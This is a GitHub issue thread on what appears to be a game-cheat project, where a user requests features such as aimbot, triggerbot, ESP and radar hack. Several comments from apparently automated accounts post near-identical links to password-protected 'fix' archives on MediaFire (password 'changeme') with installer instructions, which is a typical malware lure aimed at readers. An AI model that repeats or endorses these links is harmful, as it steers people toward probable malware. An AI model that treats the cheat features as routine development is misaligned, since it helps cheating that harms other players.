### ISSUE TITLE
Suggestion

### ISSUE THREAD

**Issue by skrvt** [g0ldyy/NameIt#27]
- Fix boxes in esp
- fix bhop
- fix noflash
- fix triggerbot
- add aimbot and silent aim (if possible)
- add radar hack
- add spectator alert
- add skinchanger (if possible)
- add granade prediction

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ImInTheICU** [comment]
Thanks for the suggestions. 
A-lot of these would bring the red trust factor chance up on the cheat. 
Which we don't want to do at this time. That cheat is no longer receiving any major updates unless it's to fix a fatal error.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by skrvt** [comment]
@g0ldyy just remove this whole "issue", bcuz i keep getting emails everyday from bots
